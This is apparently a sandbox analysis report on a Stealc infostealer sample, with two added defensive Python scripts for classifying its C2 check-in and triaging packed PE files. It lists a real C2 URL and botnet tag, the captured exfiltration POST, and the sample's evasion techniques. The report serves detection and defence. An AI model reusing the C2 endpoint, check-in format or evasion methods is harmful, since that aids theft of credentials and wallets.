Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532619
MD5: 7299a751b9b88863206dd5259f551f8e
SHA1: bebfc704d946a2b845a05beb83a6960ad7aefba2
SHA256: 613b4f35bfac7662559bd5c36e06493e60463f11d443ddd8d334bd361ea8d969
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7299A751B9B88863206DD5259F551F8E)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (network traffic):
  • dump.pcap: JoeSecurity_Stealc_1 (Yara detected Stealc; author: Joe Security)

Yara matches (memory dumps):
  • 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_Stealc (Yara detected Stealc; author: Joe Security)
  • 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp: JoeSecurity_Stealc (Yara detected Stealc; author: Joe Security)
  • 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmp: JoeSecurity_Stealc (Yara detected Stealc; author: Joe Security)
  • Process Memory Space: file.exe PID: 7480: JoeSecurity_PowershellDownloadAndExecute (Yara detected Powershell download and execute; author: Joe Security)
  • Process Memory Space: file.exe PID: 7480: JoeSecurity_Stealc (Yara detected Stealc; author: Joe Security)

Yara matches (unpacked PE files):
  • 0.2.file.exe.1c0000.0.unpack: JoeSecurity_Stealc (Yara detected Stealc; author: Joe Security)

No Sigma rule has matched

Suricata alerts:
  • 2024-10-13T18:59:08.768360+0200, SID 2044243, severity 1, classtype "Malware Command and Control Activity Detected", 192.168.2.4:49730 -> 185.215.113.37:80, TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.1c0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFI
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 33 46 42 30 31 46 36 42 41 31 39 30 34 36 36 35 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 2d 2d 0d 0a
    Data Ascii:
    ------JJJKEHCAKFBFHJKEHCFI
    Content-Disposition: form-data; name="hwid"

    87C3FB01F6BA1904665954
    ------JJJKEHCAKFBFHJKEHCFI
    Content-Disposition: form-data; name="build"

    doma
    ------JJJKEHCAKFBFHJKEHCFI--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771323751.000000000150D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?M9
Source: file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpRL
Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/rosoft
Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37e
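The check-in above is the whole of the sample's first contact: a bare POST with no User-Agent, sent to a hard-coded IP without any DNS lookup, carrying two multipart fields (hwid and build) to a .php gate. The parser and classifier below is an added example written for this page, not Joe Sandbox or Stealc code. It rebuilds the captured request from the headers and the "Data Raw" hex shown above (constructed inline, so it runs offline), pairs it with a constructed benign upload, and reports which traits of the captured check-in a request shares. The indicator thresholds and the upper-case-hex shape of hwid are assumptions generalised from this single capture, not a specification of the family's protocol.

```python
import re

# Constructed from the check-in captured in this report: the request line and
# headers listed above, and the 211-byte body decoded from the "Data Raw" hex.
STEALC_CHECKIN = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFI\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------JJJKEHCAKFBFHJKEHCFI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"87C3FB01F6BA1904665954\r\n"
    b"------JJJKEHCAKFBFHJKEHCFI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------JJJKEHCAKFBFHJKEHCFI--\r\n"
)

# Constructed benign upload for comparison: the client names itself and the
# form fields are not the stealer's hwid/build pair.
BENIGN_UPLOAD = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: files.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n"
    b"\r\n"
    b"--abc123\r\n"
    b'Content-Disposition: form-data; name="comment"\r\n'
    b"\r\n"
    b"hello\r\n"
    b"--abc123--\r\n"
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return method.decode(), path.decode(), headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":      # preamble or the closing "--" marker
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_head)
        if match:
            fields[match.group(1).decode()] = value
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Score one request against the traits of the captured Stealc check-in."""
    method, path, headers, body = parse_request(raw)
    fields = {}
    match = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if match:
        fields = parse_multipart(body, match.group(1))
    hwid = fields.get("hwid", b"").decode(errors="replace")
    build = fields.get("build", b"").decode(errors="replace")

    indicators = []
    if "user-agent" not in headers:
        indicators.append("no User-Agent header")
    has_pair = method == "POST" and path.endswith(".php") and {"hwid", "build"}.issubset(fields)
    if has_pair:
        indicators.append("POST to a .php gate with hwid and build form fields")
    if re.fullmatch(r"[0-9A-F]{16,32}", hwid):   # assumed shape, generalised from this capture
        indicators.append("hwid is an upper-case hex machine identifier")

    return {
        "host": headers.get("host", ""),
        "path": path,
        "hwid": hwid,
        "build": build,
        "indicators": indicators,
        # the field pair is the family trait; require one corroborating indicator
        "stealc_checkin": has_pair and len(indicators) >= 2,
    }


if __name__ == "__main__":
    for sample in (STEALC_CHECKIN, BENIGN_UPLOAD):
        print(classify_checkin(sample))
```

Run against a pcap, the same function can be fed each reassembled HTTP request; the hwid and build values it returns are what you pivot on (build is the botnet/campaign tag, "doma" here, and hwid identifies the victim machine), and the missing User-Agent plus the DNS-less connection to a raw IP are the cheap network-level tells that survive a change of gate path.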

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AD10D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005109C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00598996
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047A1AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00590200
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059A45F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042BC08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059BDAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00596E55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058E6BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0043CF2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00503FE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058AF90
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001C45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ncanagua ZLIB complexity 0.9948477909482759
Source: file.exe, 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YFNC4379.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1819136 > 1048576
Source: file.exe | Static PE information: Raw size of ncanagua is bigger than: 0x100000 < 0x196000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.1c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ncanagua:EW;tdiayxtm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ncanagua:EW;tdiayxtm:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c2eb5 should be: 0x1cbccf
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: ncanagua
Source: file.exe | Static PE information: section name: tdiayxtm
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060E076 push 2FDB0400h; mov dword ptr [esp], edi (at 0_2_0060E07F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060E076 push eax; mov dword ptr [esp], 70502E86h (at 0_2_0060E0FE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060E076 push eax; mov dword ptr [esp], 66C9C3A9h (at 0_2_0060E213)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001DB035 push ecx; ret (at 0_2_001DB048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A9008 push 30E78FAFh; mov dword ptr [esp], edi (at 0_2_005A9078)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051A82D push 1B8B3C20h; mov dword ptr [esp], ecx (at 0_2_0051A84B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051A82D push ecx; mov dword ptr [esp], 76F64100h (at 0_2_0051A851)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051A82D push 3452E328h; mov dword ptr [esp], eax (at 0_2_0051A96E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051A82D push ecx; mov dword ptr [esp], edi (at 0_2_0051A972)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051A82D push 7A3D8EA4h; mov dword ptr [esp], esi (at 0_2_0051A9AC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C30C4 push edx; mov dword ptr [esp], ebx (at 0_2_005C30C8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084F1B8 push ecx; mov dword ptr [esp], 79F7250Fh (at 0_2_0084F1F6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084F1B8 push 72308E51h; mov dword ptr [esp], edx (at 0_2_0084F217)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084F1B8 push 601113A0h; mov dword ptr [esp], edx (at 0_2_0084F23D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084F1B8 push 37641F46h; mov dword ptr [esp], ebx (at 0_2_0084F290)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084F1B8 push 30ABC673h; mov dword ptr [esp], edx (at 0_2_0084F2CA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AD10D push esi; mov dword ptr [esp], edi (at 0_2_004AD150)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AD10D push 7C893702h; mov dword ptr [esp], eax (at 0_2_004AD166)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AD10D push ebp; mov dword ptr [esp], esi (at 0_2_004AD1B9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AD10D push edi; mov dword ptr [esp], edx (at 0_2_004AD2C5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004AD10D push esi; mov dword ptr [esp], ebx (at 0_2_004AD2CC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00672134 push edi; mov dword ptr [esp], ebx (at 0_2_0067215E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005109C4 push 577301C9h; mov dword ptr [esp], ecx (at 0_2_005109E3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005109C4 push 6FCA791Ch; mov dword ptr [esp], edx (at 0_2_00510A3E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066A9F1 push eax; mov dword ptr [esp], ebp (at 0_2_0066A9FE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066A9F1 push ecx; mov dword ptr [esp], eax (at 0_2_0066ABA5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066A9F1 push 04CDC2ABh; mov dword ptr [esp], edx (at 0_2_0066ABB2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00598996 push 74928007h; mov dword ptr [esp], eax (at 0_2_005989B6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00598996 push esi; mov dword ptr [esp], 54AB5B63h (at 0_2_00598A0D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00598996 push 65AE2700h; mov dword ptr [esp], edx (at 0_2_00598A25)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00598996 push 21367672h; mov dword ptr [esp], eax (at 0_2_00598A87)
Source: file.exe | Static PE information: section name: ncanagua entropy: 7.954392600986758
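The static findings in this section (two nameless sections, a 1.6 MB section called ncanagua with entropy 7.95 and ZLIB complexity 0.99, the entry point inside .taggant rather than a code section, and a header checksum of 0x1c2eb5 where 0x1cbccf is expected) are the usual packer profile, and every one of them can be checked without executing the sample. The script below is an added example written for this page, not part of the report or of any Joe Sandbox tooling. It implements byte entropy and the PE optional-header checksum in plain Python and then applies the same rules the report uses to a section table constructed inline to mirror this sample's layout: names, sizes, entry point and checksum values come from the report, while the section contents are synthetic, so the entropies it prints are those of the constructed bytes, not of file.exe. The 7.0 entropy threshold and the list of "standard" section names are assumptions.

```python
import math
from collections import namedtuple

Section = namedtuple("Section", "name virtual_address virtual_size raw_data")

# Names a normal linker emits; anything else deserves a look (assumed list).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".xdata", ".CRT"}
CODE_SECTIONS = {".text", "CODE"}
PACKED_ENTROPY = 7.0   # bits per byte; assumed threshold, packed data sits near 8.0
LARGE_RAW = 0x100000   # 1 MiB, the raw size the report flags for ncanagua


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 for uniform."""
    n = len(data)
    if n == 0:
        return 0.0
    probs = (data.count(v) / n for v in range(256))
    return -sum(p * math.log2(p) for p in probs if p)


def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """Optional-header CheckSum over the whole file: a 16-bit word sum with the
    carry folded back in, skipping the 4-byte CheckSum field itself, plus the
    file length.  Compare the result with the stored field to spot a mismatch."""
    total = 0
    for i in range(0, len(image), 2):
        if checksum_offset <= i < checksum_offset + 4:
            continue
        word = image[i] | ((image[i + 1] << 8) if i + 1 < len(image) else 0)
        total += word
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(image)


def triage_pe(sections, entry_point_rva, stored_checksum, computed_checksum):
    """Apply the report's static heuristics and return human-readable findings."""
    findings = []
    ep_section = None
    for s in sections:
        span = max(s.virtual_size, len(s.raw_data))
        if s.virtual_address <= entry_point_rva < s.virtual_address + span:
            ep_section = s.name
        if not s.name or not all(0x21 <= ord(c) <= 0x7E for c in s.name):
            findings.append(f"section {s.name!r}: empty or non-printable name")
        elif s.name not in STANDARD_SECTIONS:
            findings.append(f"section {s.name}: non-standard name")
        entropy = shannon_entropy(s.raw_data)
        if entropy > PACKED_ENTROPY:
            findings.append(f"section {s.name}: entropy {entropy:.2f} suggests packed or encrypted data")
        if len(s.raw_data) > LARGE_RAW:
            findings.append(f"section {s.name}: raw size 0x{len(s.raw_data):x} exceeds 0x{LARGE_RAW:x}")
    if ep_section is None:
        findings.append(f"entry point 0x{entry_point_rva:x} is outside every section")
    elif ep_section not in CODE_SECTIONS:
        findings.append(f"entry point 0x{entry_point_rva:x} is in {ep_section}, not a code section")
    if stored_checksum != computed_checksum:
        findings.append(f"header checksum 0x{stored_checksum:x} but computed 0x{computed_checksum:x}")
    return findings


# Constructed section table mirroring this sample's layout (names, entry point
# and checksum values from the report; the bytes are synthetic, not file.exe's).
SAMPLE_SECTIONS = [
    Section("", 0x1000, 0x1000, bytes(0x1000)),
    Section(".rsrc", 0x2000, 0x400, bytes(0x300) + b"MZ" * 0x80),
    Section(".idata", 0x3000, 0x200, bytes(0x200)),
    Section("ncanagua", 0x4000, 0x196000, bytes(range(256)) * 0x1001),   # uniform bytes: entropy 8.0
    Section(".taggant", 0x19A000, 0x2000, bytes(0x2000)),
]


def triage_sample():
    return triage_pe(SAMPLE_SECTIONS, 0x19A100, 0x1C2EB5, 0x1CBCCF)


if __name__ == "__main__":
    for line in triage_sample():
        print(line)
```

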